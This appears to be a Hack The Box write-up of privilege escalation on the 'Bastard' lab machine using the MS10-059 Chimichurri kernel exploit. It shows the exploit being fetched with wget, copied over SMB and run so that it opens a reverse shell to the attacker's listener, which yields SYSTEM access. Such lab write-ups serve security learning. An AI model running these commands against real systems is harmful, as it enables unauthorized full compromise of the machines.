CVE-2010-2554(MS10-059)
The vulnerability allows an attacker to execute arbitrary code with system level privileges by exploiting a flaw in the way the Windows kernel-mode driver handles certain types of memory allocation. This vulnerability can be exploited remotely via a maliciously crafted web page or email attachment, or locally via a malicious application.
The vulnerability exists in the win32k.sys kernel-mode driver, which is responsible for handling certain types of memory allocation and user interface operations. By crafting a specific type of memory allocation request, an attacker can trigger a memory corruption condition that allows them to execute arbitrary code with system level privileges.
Older Windows systems typically have tons of vulnerabilities
exploit(chimichurri.exe)
The exploit was found here
┌──(kali㉿kali)-[~/…/htb/labs/bastard/kernelbuster]
└─$ wget https://github.com/SecWiki/windows-kernel-exploits/raw/master/MS10-059/MS10-059.exe
--2023-01-14 11:31:41-- https://github.com/SecWiki/windows-kernel-exploits/raw/master/MS10-059/MS10-059.exe
Resolving github.com (github.com)... 140.82.121.4
Connecting to github.com (github.com)|140.82.121.4|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/SecWiki/windows-kernel-exploits/master/MS10-059/MS10-059.exe [following]
--2023-01-14 11:31:41-- https://raw.githubusercontent.com/SecWiki/windows-kernel-exploits/master/MS10-059/MS10-059.exe
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.111.133, 185.199.110.133, 185.199.108.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.111.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 784384 (766K) [application/octet-stream]
Saving to: ‘MS10-059.exe’
MS10-059.exe 100%[==============================>] 766.00K --.-KB/s in 0.04s
2023-01-14 11:31:41 (18.3 MB/s) - ‘MS10-059.exe’ saved [784384/784384]I downloaded the exploit
Privilege Escalation
ps c:\tmp> copy \\10.10.14.6\smb\MS10-059.exe
ps c:\tmp> .\MS10-059.exe
/chimichurri/-->this exploit gives you a local system shell <br>/chimichurri/-->usage: Chimichurri.exe ipaddress port <BR>
I transferred the executable. Based on the usage shown, I don’t think I would need to supply any additional binary like how I usually do.
ps c:\tmp> .\MS10-059.exe 10.10.14.6 1234Executing the exploit
┌──(kali㉿kali)-[~/archive/htb/labs/bastard]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.9] 49321
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
c:\tmp> whoami
whoami
nt authority\system
c:\tmp> hostname
hostname
Bastard
c:\tmp> ipconfig
ipconfig
Windows IP Configuration
ethernet adapter local area connection:
connection-specific dns suffix . :
ipv4 address. . . . . . . . . . . : 10.10.10.9
subnet mask . . . . . . . . . . . : 255.255.255.0
default gateway . . . . . . . . . : 10.10.10.2
tunnel adapter isatap.{56fec108-3f71-4327-bf45-2b4ee355cd0f}:
media state . . . . . . . . . . . : Media disconnected
connection-specific dns suffix . :
tunnel adapter local area connection* 9:
media state . . . . . . . . . . . : Media disconnected
connection-specific dns suffix . : System Level Compromise